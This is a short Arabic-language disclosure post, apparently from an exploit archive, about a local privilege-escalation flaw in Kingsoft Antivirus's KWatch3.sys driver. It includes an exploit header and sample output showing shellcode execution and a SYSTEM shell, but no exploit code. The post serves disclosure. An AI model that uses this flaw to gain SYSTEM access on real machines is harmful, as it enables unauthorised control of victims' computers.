
استغلال ثغرة قديمة محليًّا لتصعيد الامتيازات في برنامج تشغيل KWatch لمكافحة الفيروسات Kingsoft الإصدار 2009.3.17.77.
استغلال عمره سنوات لثغرة EoP محلية في برنامج Kingsoft Antivirus KWatch Driver الإصدار 2009.3.17.77.
أبلغت عن المشكلة في يناير 2014 وتم إخطاري بـ CVE بعد أكثر من 8 سنوات. قررت رفع هذا لأنه من المضحك بما يكفي العثور على كودي القديم وأن الأمر استغرق كل هذه المدة.
وبالتالي، لا يمكن أن تكون هذه ثغرة جديدة رغم أن CVE جديد -- بحث سريع أظهر تقارير متعددة لنفس الثغرة التي تبدو مشابهة بالفعل.
ما زلت أشكر IPA على قيامهم بدورهم وجعل يومي رائعًا.
يبدو أن الملف المعرض للخطر هو ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//
/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.
------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/